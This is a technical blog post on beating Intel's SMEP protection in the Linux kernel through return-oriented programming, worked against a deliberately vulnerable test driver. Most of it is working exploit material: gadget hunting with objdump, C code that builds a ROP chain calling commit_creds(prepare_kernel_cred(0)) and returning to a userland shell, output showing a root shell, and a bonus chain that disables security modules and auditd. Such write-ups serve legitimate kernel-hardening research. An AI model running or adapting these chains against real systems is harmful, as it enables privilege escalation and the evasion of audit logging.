Beat SMEP on Linux with Return-Oriented Programming
- November 9th, 2011
Introduction
In this post, I will show you how easy it is to use Return-Oriented Programming (ROP) in the Linux kernel and how it can bypass protections such as SMEP, which will be available in the next generation of Intel processors.
Linux buggy module
In order to simplify exploitation I have decided to develop a buggy driver containing a stack overflow.
Here is the important code (kbof.c):
struct kbof {
    size_t size;    /* number of bytes to copy, fully user-controlled */
    char *buf;      /* userland source buffer */
};

static int kbof_stackbof(struct kbof *kb)
{
    char buf[64];

    printk(KERN_INFO "kbof_stackbof: buf = %p size = %zu\n", kb->buf, kb->size);
    /* Intentional bug: kb->size is never checked against sizeof(buf). */
    if (copy_from_user(buf, kb->buf, kb->size))
        return -EINVAL;
    return 0;
}

static long kbof_ioctl(struct file *fp, unsigned int cmd, unsigned long arg)
{
    struct kbof kb;

    /* Fetch the request descriptor from userland. */
    if (copy_from_user(&kb, (struct kbof __user *)arg, sizeof(kb)))
        return -EINVAL;
    switch (cmd) {
    case KBOF_STACKOVF:
        return kbof_stackbof(&kb);
    }
    return 0;
}
This is a really simple stack overflow where you can control both the buffer and the length of the overflow.
This code path can be reached via an ioctl. The char device created for the module is /dev/kbof.
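From userland, reaching this code path only takes an open() and an ioctl(). The following is a minimal sketch, not the code shipped with this post: the value of KBOF_STACKOVF is a placeholder (the real command number is defined by the module and is not shown here), and kbof_trigger is a name made up for illustration.

```c
#include <fcntl.h>
#include <stddef.h>
#include <sys/ioctl.h>
#include <unistd.h>

/* Mirrors struct kbof from kbof.c. */
struct kbof {
    size_t size;
    char *buf;
};

/* ASSUMPTION: placeholder value, the real one comes from the module. */
#define KBOF_STACKOVF 0

/*
 * Hands `len` bytes starting at `data` to the vulnerable ioctl.
 * Returns the ioctl() result, or -1 if the device cannot be opened.
 */
static int kbof_trigger(const char *dev, char *data, size_t len)
{
    struct kbof kb = { .size = len, .buf = data };
    int fd = open(dev, O_RDWR);
    int ret;

    if (fd < 0)
        return -1;
    ret = ioctl(fd, KBOF_STACKOVF, &kb);
    close(fd);
    return ret;
}
```

A call such as kbof_trigger("/dev/kbof", payload, payload_len) would then deliver the overflow, with the payload still to be built.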
make
mknod /dev/kbof c 60 0
chmod 666 /dev/kbof
insmod ./kbof.ko
Finding the size of the overflow
First of all, we need to get the size of the overflow.
objdump gives us the answer:
kbof_stackbof:
    push   %rbp
    mov    %rsp,%rbp
    push   %rbx
    sub    $0x58,%rsp
    ...
    mov    -0x20(%rbp),%rdx    # %rdx = size
    mov    -0x18(%rbp),%rsi    # %rsi = src
    lea    -0x60(%rbp),%rdi    # %rdi = buf
    callq  0...
    retq
The buffer is 0x60 bytes below %rbp (the Fedora kernel is compiled without -fomit-frame-pointer). The saved %rbp occupies the next 8 bytes, so the return address is stored 104 bytes (0x60 + 0x8) after buf.
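The arithmetic above translates directly into the layout of the buffer we send: 104 filler bytes, then whatever should replace the return address. Here is a small sketch of that layout; build_overflow and the macro names are made up for illustration, and the offsets are only valid for the disassembly shown above.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define BUF_TO_RBP   0x60   /* from "lea -0x60(%rbp),%rdi" */
#define SAVED_RBP_SZ 0x8    /* saved %rbp sits between buf and the return address */
#define RET_OFFSET   (BUF_TO_RBP + SAVED_RBP_SZ)   /* 104 */

/*
 * Writes RET_OFFSET filler bytes followed by `nwords` 64-bit words that
 * will overwrite the return address and the stack above it.
 * Returns the total length, or 0 if `out` is too small.
 */
static size_t build_overflow(unsigned char *out, size_t cap,
                             const uint64_t *chain, size_t nwords)
{
    size_t total = RET_OFFSET + nwords * sizeof(uint64_t);

    if (total > cap)
        return 0;
    memset(out, 'A', RET_OFFSET);
    memcpy(out + RET_OFFSET, chain, nwords * sizeof(uint64_t));
    return total;
}
```

The first word of the chain lands exactly on the saved return address, so it is the first address the kernel will "return" to.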
SMEP vs kernel exploits
While the Linux kernel is easy to exploit and offers few protections, patches such as PaX or processor features such as SMEP make current exploits unusable.
SMEP is a feature that will be present in the next generation of Intel processors (Ivy Bridge). It prevents code located in userspace pages (U/S=1 in the page table entry) from being executed in ring0 (CPL=0).
It means that we can’t jump into the address space of our exploit process to execute our payload (get root credentials, execute a shell). This is where ROP comes to our rescue: as we only return to addresses in the kernel address space (U/S=0), no fault will be triggered by the CPU.
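To make the rule concrete, here is a deliberately simplified model of the check. It only looks at the U/S bit of the final page table entry (bit 2) and at the ring0 case discussed in this post; a real CPU also considers the upper paging levels, the present bit, NX and so on. The function name is made up for illustration.

```c
#include <stdbool.h>
#include <stdint.h>

#define PTE_USER (1ULL << 2)   /* U/S bit of an x86 page table entry */

/*
 * Simplified model: returns true if fetching an instruction from a page
 * described by `pte` while running at privilege level `cpl` would fault
 * because of SMEP.
 */
static bool smep_blocks_fetch(uint64_t pte, int cpl, bool smep_enabled)
{
    bool user_page = (pte & PTE_USER) != 0;

    return smep_enabled && cpl == 0 && user_page;
}
```

A classic exploit falls in the first case (ring0 fetching from a U/S=1 page), while a ROP chain only ever fetches from U/S=0 pages.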
Finding gadgets
To achieve successful ROP exploitation, we have to find gadgets in the Linux kernel image. As the kernel changes a lot, I used “git log” to find files that did not change much between releases. Several asm files (.S) in the arch/x86 directory have not changed in the last few months. If we look at these files, we can see instruction sequences that make good gadgets:
arch/x86/lib/rwsem_64.S:
call_rwsem_downgrade_wake:
    ...
    popq %r11
    popq %r10
    popq %r9
    popq %r8
    popq %rcx
    popq %rsi
    popq %rdi
    ret
arch/x86/lib/rwlock.S:
__read_lock_failed:
    decl (%rdi)
    js __read_lock_failed
    ret
To find other gadgets, we have to disassemble the Linux kernel image.
Here is how to extract a gzip-compressed kernel image (1f 8b 08 00 is the gzip signature):
$ od -A d -t x1 /boot/vmlinuz-2.6.38.6-26.rc1.fc15.x86_64 | grep '1f 8b 08 00'
0017504 48 8d 83 c0 78 3a 00 ff e0 1f 8b 08 00 86 52 c8
$ dd if=/boot/vmlinuz-2.6.38.6-26.rc1.fc15.x86_64 bs=1 skip=17513 | zcat > vmlinux
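The skip value given to dd is the offset printed by od plus the position of the signature inside that line: 17504 + 9 = 17513. The same search can be sketched in C; find_gzip_offset is a made-up helper, and it simply reports the first hit, which can in principle be a false positive since four bytes may appear by chance in the boot code.

```c
#include <stddef.h>
#include <string.h>

/*
 * Returns the offset of the first gzip signature (1f 8b 08 00) in `img`,
 * or -1 if there is none.
 */
static long find_gzip_offset(const unsigned char *img, size_t len)
{
    static const unsigned char sig[4] = { 0x1f, 0x8b, 0x08, 0x00 };

    if (len < sizeof(sig))
        return -1;
    for (size_t i = 0; i + sizeof(sig) <= len; i++) {
        if (memcmp(img + i, sig, sizeof(sig)) == 0)
            return (long)i;
    }
    return -1;
}
```

Run on the 16 bytes of the od line above, it finds the signature at position 9, which is where the 17513 comes from.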
We then use objdump to find gadgets. For example:
$ objdump -d ./vmlinux | grep "mov %rax,%rdi" -A1 | grep "callq" -B1
...
ffffffff8108fc6e: 48 89 c7    mov %rax,%rdi
ffffffff8108fc71: ff d2       callq *%rdx
...
objdump: best ROP tool ever!
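Grepping the disassembly only finds gadgets that start on an instruction boundary chosen by objdump. As a complementary sketch, the raw bytes can be scanned for a known encoding such as 48 89 c7 ff d2 (the mov/callq pair above). The function name and the idea of passing the load address as `base` are assumptions made for this example.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/*
 * Scans `text` (mapped at virtual address `base`) for every occurrence of
 * the byte pattern `pat` and stores up to `max` addresses in `out`.
 * Returns the total number of occurrences found.
 */
static size_t find_gadget(const unsigned char *text, size_t len, uint64_t base,
                          const unsigned char *pat, size_t pat_len,
                          uint64_t *out, size_t max)
{
    size_t found = 0;

    if (pat_len == 0 || len < pat_len)
        return 0;
    for (size_t i = 0; i + pat_len <= len; i++) {
        if (memcmp(text + i, pat, pat_len) != 0)
            continue;
        if (found < max)
            out[found] = base + i;
        found++;
    }
    return found;
}
```

Because x86 instructions have variable length, a byte scan like this can also turn up sequences that start in the middle of another instruction, which the objdump pipeline would never print.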
Kernel ROP exploit
Current exploits trigger a kernel bug and redirect the execution to a function similar to kernelcode():
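void kernelcode(void)
{
    /* Give root credentials to the current process. */
    commit_creds(prepare_kernel_cred(NULL));
    /* Build the frame expected by iretq and return to userland. */
    asm volatile(
        "swapgs\n"
        "movq %0, 0x20(%%rsp)\n"    /* SS */
        "movq %1, 0x18(%%rsp)\n"    /* RSP */
        "movq %2, 0x10(%%rsp)\n"    /* RFLAGS */
        "movq %3, 0x8(%%rsp)\n"     /* CS */
        "movq %4, 0x0(%%rsp)\n"     /* RIP */
        "iretq\n"
        : : "r" (user_ss), "r" (stack + sizeof(stack) / 2),
            "r" (user_rflags), "r" (user_cs), "r" (userland_code));
}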
This function sets root credentials on our process and returns to userland (CPL=3).
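The five stores in kernelcode() build the frame that iretq pops: RIP at the lowest address, then CS, RFLAGS, RSP and SS. As a sketch, the same frame can be described as an array of five 64-bit words; the enum and function names below are made up for illustration.

```c
#include <stdint.h>

/* Order in which iretq pops its frame, lowest address first. */
enum { IRET_RIP, IRET_CS, IRET_RFLAGS, IRET_RSP, IRET_SS, IRET_WORDS };

/* Fills `frame` with the userland context to resume after iretq. */
static void fill_iret_frame(uint64_t frame[IRET_WORDS],
                            uint64_t rip, uint64_t cs, uint64_t rflags,
                            uint64_t rsp, uint64_t ss)
{
    frame[IRET_RIP]    = rip;      /* 0x00(%rsp): where userland resumes */
    frame[IRET_CS]     = cs;       /* 0x08(%rsp) */
    frame[IRET_RFLAGS] = rflags;   /* 0x10(%rsp) */
    frame[IRET_RSP]    = rsp;      /* 0x18(%rsp): userland stack pointer */
    frame[IRET_SS]     = ss;       /* 0x20(%rsp) */
}
```

The index of each slot multiplied by 8 gives the offsets used by the movq instructions, which is a quick way to double-check the operand order.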
I decided to take the same approach for my ROP exploit.
ROP: getting root privileges
Calling prepare_kernel_cred with the first argument set to NULL is easy. The following stack frame does this:
[ ... ]
[ POP_RDI_RET ]
[ 0UL ]
[ @prepare_kernel_cred ]
[ ... ]
Remember that the x86_64 ABI passes the first argument of a function in %rdi.
But it’s tricky to get the return value of prepare_kernel_cred (%rax) and use it as the commit_creds argument (%rdi). With the help of objdump, we find an interesting sequence:
ffffffff8108fc6e: 48 89 c7    mov %rax,%rdi
ffffffff8108fc71: ff d2       callq *%rdx
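We can’t directly set %rdx to commit_creds because the call instruction pushes a return address on the stack: commit_creds would return to the instruction following the callq instead of continuing our chain. Instead, %rdx points to a “pop %rcx; ret” gadget, which discards the pushed return address and returns to the next entry of the chain. To understand how it actually works, look at the final ROP payload below.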
ROP: returning to userland
Now that we have root credentials on the machine, we would like to return to our userland process.
paranoid_swapgs is a good candidate:
paranoid_swapgs:
    swapgs
    [ restore registers ]
    add $0x30,%rsp
    [ restore registers ]
    add $0x50,%rsp
    jmpq irq_return    # iretq
Final ROP payload
The final ROP payload is:
[ POP_RDI_RET ]
[ 0UL ]
[ @prepare_kernel_cred ]
[ @POP_RDX_RCX_RET ]
[ @POP_RCX_RET ]
[ JUNK ]
[ @MOV_RAX_RDI_CALL_RDX ]
[ @commit_creds ]
[ @paranoid_swapgs ]
[ 0x30 + 0x50 bytes junk ]
[ @exec_shell ]
[ user_cs ]
[ user_rflags ]
[ @stack ]
[ user_ss ]
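In C, this payload boils down to filling an array of 64-bit words in that exact order. The sketch below is one way to write it, not the exploit's actual source: the struct and function names are invented, every address is expected to be resolved for the running kernel, and the amount of junk after paranoid_swapgs (0x30 + 0x50 bytes) is only valid for the kernel build discussed here.

```c
#include <stddef.h>
#include <stdint.h>

/* Addresses of the gadgets and kernel functions (resolved at run time). */
struct rop_addrs {
    uint64_t pop_rdi_ret;
    uint64_t pop_rdx_rcx_ret;
    uint64_t pop_rcx_ret;
    uint64_t mov_rax_rdi_call_rdx;
    uint64_t prepare_kernel_cred;
    uint64_t commit_creds;
    uint64_t paranoid_swapgs;
};

/* Userland context restored by the final iretq. */
struct user_ctx {
    uint64_t rip, cs, rflags, rsp, ss;
};

#define JUNK              0x4141414141414141ULL
#define SWAPGS_JUNK_WORDS ((0x30 + 0x50) / 8)   /* skipped by the two add ...,%rsp */
#define CHAIN_WORDS       (9 + SWAPGS_JUNK_WORDS + 5)

/* Writes the chain into `c`; returns the number of words, or 0 if cap is too small. */
static size_t build_chain(uint64_t *c, size_t cap,
                          const struct rop_addrs *a, const struct user_ctx *u)
{
    size_t n = 0;

    if (cap < CHAIN_WORDS)
        return 0;
    c[n++] = a->pop_rdi_ret;
    c[n++] = 0;                          /* %rdi = NULL */
    c[n++] = a->prepare_kernel_cred;     /* %rax = new credentials */
    c[n++] = a->pop_rdx_rcx_ret;
    c[n++] = a->pop_rcx_ret;             /* -> %rdx, target of callq *%rdx */
    c[n++] = JUNK;                       /* -> %rcx */
    c[n++] = a->mov_rax_rdi_call_rdx;    /* %rdi = %rax, then call pop_rcx_ret */
    c[n++] = a->commit_creds;            /* reached once the pushed return address is popped */
    c[n++] = a->paranoid_swapgs;
    for (size_t i = 0; i < SWAPGS_JUNK_WORDS; i++)
        c[n++] = JUNK;
    c[n++] = u->rip;                     /* iretq frame: RIP, CS, RFLAGS, RSP, SS */
    c[n++] = u->cs;
    c[n++] = u->rflags;
    c[n++] = u->rsp;
    c[n++] = u->ss;
    return n;
}
```

The callq pushes its own return address just below commit_creds in the chain; the pop %rcx gadget removes it, so the following ret picks up commit_creds with %rdi already holding the new credentials.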
Time to test our exploit:
[falken@vm-F15 kernel_overflow]$ ./exploit_rop
[+] call_rwsem_downgrade_wake is at 0xffffffff81232500
[+] prepare_kernel_cred is at 0xffffffff81074718
[+] commit_creds is at 0xffffffff81074403
[+] paranoid_swapgs is at 0xffffffff8147611d
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:kernel_t:s0
W00t !
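The "[+] ... is at ..." lines show that the exploit resolves kernel symbols at run time. How it does so is not shown here; one common source is /proc/kallsyms, and the sketch below assumes that format ("address type name" on each line). ksym_match is a made-up helper that checks a single line.

```c
#include <stdio.h>
#include <string.h>

/*
 * Parses one line in the "<hex address> <type> <name>" format.
 * Returns 1 and stores the address in *addr if the symbol is `name`,
 * 0 otherwise (including when the line cannot be parsed).
 */
static int ksym_match(const char *line, const char *name,
                      unsigned long long *addr)
{
    unsigned long long a;
    char type;
    char sym[256];

    if (sscanf(line, "%llx %c %255s", &a, &type, sym) != 3)
        return 0;
    if (strcmp(sym, name) != 0)
        return 0;
    *addr = a;
    return 1;
}
```

Feeding it each line read with fgets() from the file is enough to look up a handful of symbols. On kernels that restrict kernel pointers for unprivileged users, the addresses read as zero and another source is needed.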
Bonus: disable security modules & auditd
Disabling security modules can be done by calling reset_security_ops:
static struct security_operations default_security_ops = {
    .name = "default",
};
...
void reset_security_ops(void)
{
    security_ops = &default_security_ops;
}
In order to disable auditd we have to set the variable audit_enabled to 0. This variable is set to 1 when auditing is enabled.
In rwlock.S, we find the perfect gadget:
    decl (%rdi)
    js __read_lock_failed    # not taken since (%rdi) == 0
    ret
The corresponding stack frame is:
[ @POP_RDI_RET ]
[ @audit_enabled ]
[ @DEC_RDI_ADDR_RET ]
[ @reset_security_ops ]
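This gadget only behaves like a plain "decrement and return" when the value it decrements ends up non-negative. A tiny model of decl followed by js makes the condition explicit; the function name is made up, and the model only tracks the sign flag.

```c
#include <stdbool.h>
#include <stdint.h>

/*
 * Models "decl (%rdi); js target": decrements the 32-bit value at `p`
 * and returns true if the js branch would be taken (result negative).
 */
static bool decl_then_js_taken(int32_t *p)
{
    uint32_t r = (uint32_t)*p - 1u;   /* wraps like the CPU does */

    *p = (int32_t)r;
    return (r >> 31) != 0;            /* sign flag */
}
```

With audit_enabled equal to 1, the result is 0, the branch is not taken and the gadget returns into the chain. If the variable were already 0, the result would be -1 and execution would jump back into __read_lock_failed instead.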
Other ideas to bypass SMEP
- Disable SMEP by flipping the proper bit in CR4.
- Allocate a RWX page, copy our shellcode and jump to it.
- Store the ROP payload in userspace as SMEP does not prevent kernel code from accessing userland data.
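For the first idea, the bit in question is CR4 bit 20 (X86_CR4_SMEP in the kernel headers). The sketch below only computes the new register value; actually loading it would require a gadget that writes %cr4, which is not covered here, and cr4_without_smep is a made-up name.

```c
#include <stdint.h>

#define X86_CR4_SMEP (1ULL << 20)   /* SMEP enable bit in CR4 */

/* Returns `cr4` with SMEP cleared and every other bit untouched. */
static uint64_t cr4_without_smep(uint64_t cr4)
{
    return cr4 & ~X86_CR4_SMEP;
}
```

For example, a CR4 value of 0x1006f0 becomes 0x6f0 once the SMEP bit is cleared.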
Conclusion
SMEP will certainly make kernel exploitation harder. Combined with a relocatable kernel and kernel symbol hiding, the ROP technique presented here becomes very difficult to carry out… as long as there is no information leak.
Links & code:
SMEP: What is It, and How to Beat It on Linux
SMEP: What is it, and how to beat it on Windows
